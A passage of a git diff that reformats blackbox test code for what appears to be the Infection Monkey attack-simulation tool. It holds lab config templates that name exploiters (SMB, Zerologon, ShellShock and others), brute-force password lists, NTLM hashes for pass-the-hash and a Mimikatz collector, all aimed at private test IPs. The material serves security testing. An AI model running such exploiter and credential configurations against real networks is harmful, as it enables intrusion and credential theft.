b/envs/monkey_zoo/blackbox/config_templates/drupal.py @@ -7,8 +7,10 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Drupal(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"], - "basic.exploiters.exploiter_classes": ["DrupalExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.28"] - }) + config_values.update( + { + "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"], + "basic.exploiters.exploiter_classes": ["DrupalExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.28"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/elastic.py b/envs/monkey_zoo/blackbox/config_templates/elastic.py index 56021e959..43b276d53 100644 --- a/envs/monkey_zoo/blackbox/config_templates/elastic.py +++ b/envs/monkey_zoo/blackbox/config_templates/elastic.py @@ -8,8 +8,10 @@ class Elastic(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"], - "internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"], - "basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"], + "internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"], + "basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/hadoop.py b/envs/monkey_zoo/blackbox/config_templates/hadoop.py index d136068e5..86540bde6 100644 --- a/envs/monkey_zoo/blackbox/config_templates/hadoop.py +++ b/envs/monkey_zoo/blackbox/config_templates/hadoop.py @@ -8,7 +8,9 @@ class Hadoop(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["HadoopExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["HadoopExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/mssql.py b/envs/monkey_zoo/blackbox/config_templates/mssql.py index 003f9f8d3..61249044c 100644 --- a/envs/monkey_zoo/blackbox/config_templates/mssql.py +++ b/envs/monkey_zoo/blackbox/config_templates/mssql.py @@ -7,14 +7,16 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Mssql(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["MSSQLExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.16"], - "basic.credentials.exploit_password_list": ["Password1!", - "Xk8VDTsC", - "password", - "12345678"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["MSSQLExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.16"], + "basic.credentials.exploit_password_list": [ + "Password1!", + "Xk8VDTsC", + "password", + "12345678", + ], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py index e9e34727d..e5213b649 100644 --- a/envs/monkey_zoo/blackbox/config_templates/performance.py +++ b/envs/monkey_zoo/blackbox/config_templates/performance.py @@ -3,52 +3,60 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Performance(ConfigTemplate): config_values = { - "basic.credentials.exploit_password_list": ["Xk8VDTsC", - "^NgDvY59~8", - "Ivrrw5zEzs", - "3Q=(Ge(+&w]*", - "`))jU7L(w}", - "t67TC5ZDmz"], + "basic.credentials.exploit_password_list": [ + "Xk8VDTsC", + "^NgDvY59~8", + "Ivrrw5zEzs", + "3Q=(Ge(+&w]*", + "`))jU7L(w}", + "t67TC5ZDmz", + ], "basic.credentials.exploit_user_list": ["m0nk3y"], - "basic.exploiters.exploiter_classes": ["SmbExploiter", - "WmiExploiter", - "SSHExploiter", - "ShellShockExploiter", - "SambaCryExploiter", - "ElasticGroovyExploiter", - "Struts2Exploiter", - "WebLogicExploiter", - "HadoopExploiter", - "VSFTPDExploiter", - "MSSQLExploiter", - "ZerologonExploiter"], - "basic_network.network_analysis.inaccessible_subnets": ["10.2.2.0/30", - "10.2.2.8/30", - "10.2.2.24/32", - "10.2.2.23/32", - "10.2.2.21/32", - "10.2.2.19/32", - "10.2.2.18/32", - "10.2.2.17/32"], - "basic_network.scope.subnet_scan_list": ["10.2.2.2", - "10.2.2.3", - "10.2.2.4", - "10.2.2.5", - "10.2.2.8", - "10.2.2.9", - "10.2.1.10", - "10.2.0.11", - "10.2.0.12", - "10.2.2.11", - "10.2.2.12", - "10.2.2.14", - "10.2.2.15", - "10.2.2.16", - "10.2.2.18", - "10.2.2.19", - "10.2.2.20", - "10.2.2.21", - "10.2.2.23", - "10.2.2.24", - "10.2.2.25"] + "basic.exploiters.exploiter_classes": [ + "SmbExploiter", + "WmiExploiter", + "SSHExploiter", + "ShellShockExploiter", + "SambaCryExploiter", + "ElasticGroovyExploiter", + "Struts2Exploiter", + "WebLogicExploiter", + "HadoopExploiter", + "VSFTPDExploiter", + "MSSQLExploiter", + "ZerologonExploiter", + ], + "basic_network.network_analysis.inaccessible_subnets": [ + "10.2.2.0/30", + "10.2.2.8/30", + "10.2.2.24/32", + "10.2.2.23/32", + "10.2.2.21/32", + "10.2.2.19/32", + "10.2.2.18/32", + "10.2.2.17/32", + ], + "basic_network.scope.subnet_scan_list": [ + "10.2.2.2", + "10.2.2.3", + "10.2.2.4", + "10.2.2.5", + "10.2.2.8", + "10.2.2.9", + "10.2.1.10", + "10.2.0.11", + "10.2.0.12", + "10.2.2.11", + "10.2.2.12", + "10.2.2.14", + "10.2.2.15", + "10.2.2.16", + "10.2.2.18", + "10.2.2.19", + "10.2.2.20", + "10.2.2.21", + "10.2.2.23", + "10.2.2.24", + "10.2.2.25", + ], } diff --git a/envs/monkey_zoo/blackbox/config_templates/shellshock.py b/envs/monkey_zoo/blackbox/config_templates/shellshock.py index 71d968e0b..ba1a8f915 100644 --- a/envs/monkey_zoo/blackbox/config_templates/shellshock.py +++ b/envs/monkey_zoo/blackbox/config_templates/shellshock.py @@ -7,7 +7,9 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class ShellShock(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["ShellShockExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.8"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["ShellShockExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.8"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/smb_mimikatz.py b/envs/monkey_zoo/blackbox/config_templates/smb_mimikatz.py index f563bc8d1..7a8d9060c 100644 --- a/envs/monkey_zoo/blackbox/config_templates/smb_mimikatz.py +++ b/envs/monkey_zoo/blackbox/config_templates/smb_mimikatz.py @@ -7,14 +7,18 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class SmbMimikatz(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["SmbExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"], - "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"], - "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], - "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"], - "monkey.system_info.system_info_collector_classes": ["EnvironmentCollector", - "HostnameCollector", - "ProcessListCollector", - "MimikatzCollector"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["SmbExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"], + "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"], + "monkey.system_info.system_info_collector_classes": [ + "EnvironmentCollector", + "HostnameCollector", + "ProcessListCollector", + "MimikatzCollector", + ], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/smb_pth.py b/envs/monkey_zoo/blackbox/config_templates/smb_pth.py index edee4cdbd..b8b54090d 100644 --- a/envs/monkey_zoo/blackbox/config_templates/smb_pth.py +++ b/envs/monkey_zoo/blackbox/config_templates/smb_pth.py @@ -11,12 +11,10 @@ class SmbPth(ConfigTemplate): "basic.exploiters.exploiter_classes": ["SmbExploiter"], "basic_network.scope.subnet_scan_list": ["10.2.2.15"], "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"], - "internal.classes.finger_classes": ["SMBFinger", - "PingScanner", - "HTTPFinger"], - "internal.classes.exploits.exploit_ntlm_hash_list": ["5da0889ea2081aa79f6852294cba4a5e", - "50c9987a6bf1ac59398df9f911122c9b"] + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"], + "internal.classes.exploits.exploit_ntlm_hash_list": [ + "5da0889ea2081aa79f6852294cba4a5e", + "50c9987a6bf1ac59398df9f911122c9b", + ], } diff --git a/envs/monkey_zoo/blackbox/config_templates/ssh.py b/envs/monkey_zoo/blackbox/config_templates/ssh.py index 90871e52b..3cff3222a 100644 --- a/envs/monkey_zoo/blackbox/config_templates/ssh.py +++ b/envs/monkey_zoo/blackbox/config_templates/ssh.py @@ -7,17 +7,12 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Ssh(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["SSHExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.11", - "10.2.2.12"], - "basic.credentials.exploit_password_list": ["Password1!", - "12345678", - "^NgDvY59~8"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"], - "internal.classes.finger_classes": ["SSHFinger", - "PingScanner", - "HTTPFinger"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["SSHExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.11", "10.2.2.12"], + "basic.credentials.exploit_password_list": ["Password1!", "12345678", "^NgDvY59~8"], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "internal.classes.finger_classes": ["SSHFinger", "PingScanner", "HTTPFinger"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/struts2.py b/envs/monkey_zoo/blackbox/config_templates/struts2.py index 6eb399568..03b8ef38e 100644 --- a/envs/monkey_zoo/blackbox/config_templates/struts2.py +++ b/envs/monkey_zoo/blackbox/config_templates/struts2.py @@ -8,7 +8,9 @@ class Struts2(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["Struts2Exploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["Struts2Exploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/tunneling.py b/envs/monkey_zoo/blackbox/config_templates/tunneling.py index ac46eb110..d23ad8708 100644 --- a/envs/monkey_zoo/blackbox/config_templates/tunneling.py +++ b/envs/monkey_zoo/blackbox/config_templates/tunneling.py @@ -7,27 +7,30 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Tunneling(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["SmbExploiter", - "WmiExploiter", - "SSHExploiter" - ], - "basic_network.scope.subnet_scan_list": ["10.2.2.9", - "10.2.1.10", - "10.2.0.11", - "10.2.0.12"], - "basic_network.scope.depth": 3, - "internal.general.keep_tunnel_open_time": 180, - "basic.credentials.exploit_password_list": ["Password1!", - "3Q=(Ge(+&w]*", - "`))jU7L(w}", - "t67TC5ZDmz", - "12345678"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"], - "internal.classes.finger_classes": ["SSHFinger", - "PingScanner", - "HTTPFinger", - "SMBFinger"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["SmbExploiter", "WmiExploiter", "SSHExploiter"], + "basic_network.scope.subnet_scan_list": [ + "10.2.2.9", + "10.2.1.10", + "10.2.0.11", + "10.2.0.12", + ], + "basic_network.scope.depth": 3, + "internal.general.keep_tunnel_open_time": 180, + "basic.credentials.exploit_password_list": [ + "Password1!", + "3Q=(Ge(+&w]*", + "`))jU7L(w}", + "t67TC5ZDmz", + "12345678", + ], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "internal.classes.finger_classes": [ + "SSHFinger", + "PingScanner", + "HTTPFinger", + "SMBFinger", + ], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/weblogic.py b/envs/monkey_zoo/blackbox/config_templates/weblogic.py index 482f7abf9..21b7eed0c 100644 --- a/envs/monkey_zoo/blackbox/config_templates/weblogic.py +++ b/envs/monkey_zoo/blackbox/config_templates/weblogic.py @@ -8,7 +8,9 @@ class Weblogic(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["WebLogicExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["WebLogicExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/wmi_mimikatz.py b/envs/monkey_zoo/blackbox/config_templates/wmi_mimikatz.py index b6dbc0c88..b23f73902 100644 --- a/envs/monkey_zoo/blackbox/config_templates/wmi_mimikatz.py +++ b/envs/monkey_zoo/blackbox/config_templates/wmi_mimikatz.py @@ -7,17 +7,17 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class WmiMimikatz(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["WmiExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.14", - "10.2.2.15"], - "basic.credentials.exploit_password_list": ["Password1!", - "Ivrrw5zEzs"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"], - "monkey.system_info.system_info_collector_classes": ["EnvironmentCollector", - "HostnameCollector", - "ProcessListCollector", - "MimikatzCollector"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["WmiExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"], + "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "monkey.system_info.system_info_collector_classes": [ + "EnvironmentCollector", + "HostnameCollector", + "ProcessListCollector", + "MimikatzCollector", + ], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/zerologon.py b/envs/monkey_zoo/blackbox/config_templates/zerologon.py index 28afa281f..2eec0f4f0 100644 --- a/envs/monkey_zoo/blackbox/config_templates/zerologon.py +++ b/envs/monkey_zoo/blackbox/config_templates/zerologon.py @@ -8,9 +8,11 @@ class Zerologon(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["ZerologonExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.25"], - # Empty list to make sure ZeroLogon adds "Administrator" username - "basic.credentials.exploit_user_list": [] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["ZerologonExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.25"], + # Empty list to make sure ZeroLogon adds "Administrator" username + "basic.credentials.exploit_user_list": [], + } + ) diff --git a/envs/monkey_zoo/blackbox/conftest.py b/envs/monkey_zoo/blackbox/conftest.py index 4909bcbc7..21686f0fe 100644 --- a/envs/monkey_zoo/blackbox/conftest.py +++ b/envs/monkey_zoo/blackbox/conftest.py @@ -2,25 +2,37 @@ import pytest def pytest_addoption(parser): - parser.addoption("--island", action="store", default="", - help="Specify the Monkey Island address (host+port).") - parser.addoption("--no-gcp", action="store_true", default=False, - help="Use for no interaction with the cloud.") - parser.addoption("--quick-performance-tests", action="store_true", default=False, - help="If enabled performance tests won't reset island and won't send telemetries, " - "instead will just test performance of already present island state.") + parser.addoption( + "--island", + action="store", + default="", + help="Specify the Monkey Island address (host+port).", + ) + parser.addoption( + "--no-gcp", + action="store_true", + default=False, + help="Use for no interaction with the cloud.", + ) + parser.addoption( + "--quick-performance-tests", + action="store_true", + default=False, + help="If enabled performance tests won't reset island and won't send telemetries, " + "instead will just test performance of already present island state.", + ) -@pytest.fixture(scope='session') +@pytest.fixture(scope="session") def island(request): return request.config.getoption("--island") -@pytest.fixture(scope='session') +@pytest.fixture(scope="session") def no_gcp(request): return request.config.getoption("--no-gcp") -@pytest.fixture(scope='session') +@pytest.fixture(scope="session") def quick_performance_tests(request): return request.config.getoption("--quick-performance-tests") diff --git a/envs/monkey_zoo/blackbox/island_client/island_config_parser.py b/envs/monkey_zoo/blackbox/island_client/island_config_parser.py index 5b7211f87..8c7edaa58 100644 --- a/envs/monkey_zoo/blackbox/island_client/island_config_parser.py +++ b/envs/monkey_zoo/blackbox/island_client/island_config_parser.py @@ -8,23 +8,22 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class IslandConfigParser: - @staticmethod - def get_raw_config(config_template: Type[ConfigTemplate], - island_client: MonkeyIslandClient) -> str: + def get_raw_config( + config_template: Type[ConfigTemplate], island_client: MonkeyIslandClient + ) -> str: response = island_client.get_config() - config = IslandConfigParser.apply_template_to_config(config_template, response['configuration']) + config = IslandConfigParser.apply_template_to_config( + config_template, response["configuration"] + ) return json.dumps(config) @staticmethod - def apply_template_to_config(config_template: Type[ConfigTemplate], - config: dict) -> dict: + def apply_template_to_config(config_template: Type[ConfigTemplate], config: dict) -> dict: for path, value in config_template.config_values.items(): - dpath.util.set(config, path, value, '.') + dpath.util.set(config, path, value, ".") return config @staticmethod def get_ips_of_targets(raw_config): - return dpath.util.get(json.loads(raw_config), - "basic_network.scope.subnet_scan_list", - '.') + return dpath.util.get(json.loads(raw_config), "basic_network.scope.subnet_scan_list", ".") diff --git a/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py b/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py index 304996ebd..9ec54a56f 100644 --- a/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py +++ b/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py @@ -8,9 +8,9 @@ from bson import json_util from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5 -MONKEY_TEST_ENDPOINT = 'api/test/monkey' -TELEMETRY_TEST_ENDPOINT = 'api/test/telemetry' -LOG_TEST_ENDPOINT = 'api/test/log' +MONKEY_TEST_ENDPOINT = "api/test/monkey" +TELEMETRY_TEST_ENDPOINT = "api/test/telemetry" +LOG_TEST_ENDPOINT = "api/test/log" LOGGER = logging.getLogger(__name__) @@ -44,7 +44,7 @@ class MonkeyIslandClient(object): @staticmethod def monkey_ran_successfully(response): - return response.ok and json.loads(response.content)['is_running'] + return response.ok and json.loads(response.content)["is_running"] @avoid_race_condition def kill_all_monkeys(self): @@ -65,37 +65,41 @@ class MonkeyIslandClient(object): def find_monkeys_in_db(self, query): if query is None: raise TypeError - response = self.requests.get(MONKEY_TEST_ENDPOINT, - MonkeyIslandClient.form_find_query_for_request(query)) + response = self.requests.get( + MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query) + ) return MonkeyIslandClient.get_test_query_results(response) def find_telems_in_db(self, query: dict): if query is None: raise TypeError - response = self.requests.get(TELEMETRY_TEST_ENDPOINT, - MonkeyIslandClient.form_find_query_for_request(query)) + response = self.requests.get( + TELEMETRY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query) + ) return MonkeyIslandClient.get_test_query_results(response) def get_all_monkeys_from_db(self): - response = self.requests.get(MONKEY_TEST_ENDPOINT, - MonkeyIslandClient.form_find_query_for_request(None)) + response = self.requests.get( + MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(None) + ) return MonkeyIslandClient.get_test_query_results(response) def find_log_in_db(self, query): - response = self.requests.get(LOG_TEST_ENDPOINT, - MonkeyIslandClient.form_find_query_for_request(query)) + response = self.requests.get( + LOG_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query) + ) return MonkeyIslandClient.get_test_query_results(response) @staticmethod def form_find_query_for_request(query: Union[dict, None]) -> dict: - return {'find_query': json_util.dumps(query)} + return {"find_query": json_util.dumps(query)} @staticmethod def get_test_query_results(response): - return json.loads(response.content)['results'] + return json.loads(response.content)["results"] def is_all_monkeys_dead(self): - query = {'dead': False} + query = {"dead": False} return len(self.find_monkeys_in_db(query)) == 0 def clear_caches(self): diff --git a/envs/monkey_zoo/blackbox/island_client/monkey_island_requests.py b/envs/monkey_zoo/blackbox/island_client/monkey_island_requests.py index 226a0043c..4575f465e 100644 --- a/envs/monkey_zoo/blackbox/island_client/monkey_island_requests.py +++ b/envs/monkey_zoo/blackbox/island_client/monkey_island_requests.py @@ -8,8 +8,10 @@ import requests from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod # SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()' -NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \ - '8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557' +NO_AUTH_CREDS = ( + "55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062" + "8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557" +) LOGGER = logging.getLogger(__name__) @@ -18,10 +20,12 @@ class MonkeyIslandRequests(object): def __init__(self, server_address): self.addr = "https://{IP}/".format(IP=server_address) self.token = self.try_get_jwt_from_server() - self.supported_request_methods = {SupportedRequestMethod.GET: self.get, - SupportedRequestMethod.POST: self.post, - SupportedRequestMethod.PATCH: self.patch, - SupportedRequestMethod.DELETE: self.delete} + self.supported_request_methods = { + SupportedRequestMethod.GET: self.get, + SupportedRequestMethod.POST: self.post, + SupportedRequestMethod.PATCH: self.patch, + SupportedRequestMethod.DELETE: self.delete, + } def get_request_time(self, url, method: SupportedRequestMethod, data=None): response = self.send_request_by_method(url, method, data) @@ -44,7 +48,10 @@ class MonkeyIslandRequests(object): return self.get_jwt_from_server() except requests.ConnectionError as err: LOGGER.error( - "Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr)) + "Unable to connect to island, aborting! Error information: {}. Server: {}".format( + err, self.addr + ) + ) assert False class _Decorators: @@ -59,45 +66,45 @@ class MonkeyIslandRequests(object): return request_function_wrapper def get_jwt_from_server(self): - resp = requests.post(self.addr + "api/auth", # noqa: DUO123 - json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS}, - verify=False) + resp = requests.post( + self.addr + "api/auth", # noqa: DUO123 + json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS}, + verify=False, + ) return resp.json()["access_token"] @_Decorators.refresh_jwt_token def get(self, url, data=None): - return requests.get(self.addr + url, # noqa: DUO123 - headers=self.get_jwt_header(), - params=data, - verify=False) + return requests.get( + self.addr + url, # noqa: DUO123 + headers=self.get_jwt_header(), + params=data, + verify=False, + ) @_Decorators.refresh_jwt_token def post(self, url, data): - return requests.post(self.addr + url, # noqa: DUO123 - data=data, - headers=self.get_jwt_header(), - verify=False) + return requests.post( + self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123 + ) @_Decorators.refresh_jwt_token def post_json(self, url, data: Dict): - return requests.post(self.addr + url, # noqa: DUO123 - json=data, - headers=self.get_jwt_header(), - verify=False) + return requests.post( + self.addr + url, json=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123 + ) @_Decorators.refresh_jwt_token def patch(self, url, data: Dict): - return requests.patch(self.addr + url, # noqa: DUO123 - data=data, - headers=self.get_jwt_header(), - verify=False) + return requests.patch( + self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123 + ) @_Decorators.refresh_jwt_token def delete(self, url): return requests.delete( # noqa: DOU123 - self.addr + url, - headers=self.get_jwt_header(), - verify=False) + self.addr + url, headers=self.get_jwt_header(), verify=False + ) @_Decorators.refresh_jwt_token def get_jwt_header(self): diff --git a/envs/monkey_zoo/blackbox/log_handlers/monkey_log.py b/envs/monkey_zoo/blackbox/log_handlers/monkey_log.py index b7f424a69..f49b199a1 100644 --- a/envs/monkey_zoo/blackbox/log_handlers/monkey_log.py +++ b/envs/monkey_zoo/blackbox/log_handlers/monkey_log.py @@ -12,16 +12,16 @@ class MonkeyLog(object): self.log_dir_path = log_dir_path def download_log(self, island_client): - log = island_client.find_log_in_db({'monkey_id': ObjectId(self.monkey['id'])}) + log = island_client.find_log_in_db({"monkey_id": ObjectId(self.monkey["id"])}) if not log: - LOGGER.error("Log for monkey {} not found".format(self.monkey['ip_addresses'][0])) + LOGGER.error("Log for monkey {} not found".format(self.monkey["ip_addresses"][0])) return False else: self.write_log_to_file(log) return True def write_log_to_file(self, log): - with open(self.get_log_path_for_monkey(self.monkey), 'w') as log_file: + with open(self.get_log_path_for_monkey(self.monkey), "w") as log_file: log_file.write(MonkeyLog.parse_log(log)) @staticmethod @@ -32,7 +32,7 @@ class MonkeyLog(object): @staticmethod def get_filename_for_monkey_log(monkey): - return "{}.txt".format(monkey['ip_addresses'][0]) + return "{}.txt".format(monkey["ip_addresses"][0]) def get_log_path_for_monkey(self, monkey): return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey)) diff --git a/envs/monkey_zoo/blackbox/log_handlers/monkey_log_parser.py b/envs/monkey_zoo/blackbox/log_handlers/monkey_log_parser.py index 44804a1fd..6a046a474 100644 --- a/envs/monkey_zoo/blackbox/log_handlers/monkey_log_parser.py +++ b/envs/monkey_zoo/blackbox/log_handlers/monkey_log_parser.py @@ -5,13 +5,12 @@ LOGGER = logging.getLogger(__name__) class MonkeyLogParser(object): - def __init__(self, log_path): self.log_path = log_path self.log_contents = self.read_log() def read_log(self): - with open(self.log_path, 'r') as log: + with open(self.log_path, "r") as log: return log.read() def print_errors(self): diff --git a/envs/monkey_zoo/blackbox/log_handlers/monkey_logs_downloader.py b/envs/monkey_zoo/blackbox/log_handlers/monkey_logs_downloader.py index dbed46780..302da8fc7 100644 --- a/envs/monkey_zoo/blackbox/log_handlers/monkey_logs_downloader.py +++ b/envs/monkey_zoo/blackbox/log_handlers/monkey_logs_downloader.py @@ -6,7 +6,6 @@ LOGGER = logging.getLogger(__name__) class MonkeyLogsDownloader(object): - def __init__(self, island_client, log_dir_path): self.island_client = island_client self.log_dir_path = log_dir_path diff --git a/envs/monkey_zoo/blackbox/log_handlers/test_logs_handler.py b/envs/monkey_zoo/blackbox/log_handlers/test_logs_handler.py index bae6a9adc..55a242bec 100644 --- a/envs/monkey_zoo/blackbox/log_handlers/test_logs_handler.py +++ b/envs/monkey_zoo/blackbox/log_handlers/test_logs_handler.py @@ -5,7 +5,7 @@ import shutil from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader -LOG_DIR_NAME = 'logs' +LOG_DIR_NAME = "logs" LOGGER = logging.getLogger(__name__) @@ -18,8 +18,10 @@ class TestLogsHandler(object): def parse_test_logs(self): log_paths = self.download_logs() if not log_paths: - LOGGER.error("No logs were downloaded. Maybe no monkeys were ran " - "or early exception prevented log download?") + LOGGER.error( + "No logs were downloaded. Maybe no monkeys were ran " + "or early exception prevented log download?" + ) return TestLogsHandler.parse_logs(log_paths) diff --git a/envs/monkey_zoo/blackbox/test_blackbox.py b/envs/monkey_zoo/blackbox/test_blackbox.py index bfcf32fba..303d0be52 100644 --- a/envs/monkey_zoo/blackbox/test_blackbox.py +++ b/envs/monkey_zoo/blackbox/test_blackbox.py @@ -5,13 +5,10 @@ from time import sleep import pytest from typing_extensions import Type -from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import \ - CommunicationAnalyzer +from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer -from envs.monkey_zoo.blackbox.island_client.island_config_parser import \ - IslandConfigParser -from envs.monkey_zoo.blackbox.island_client.monkey_island_client import \ - MonkeyIslandClient +from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser +from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic @@ -28,33 +25,51 @@ from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import 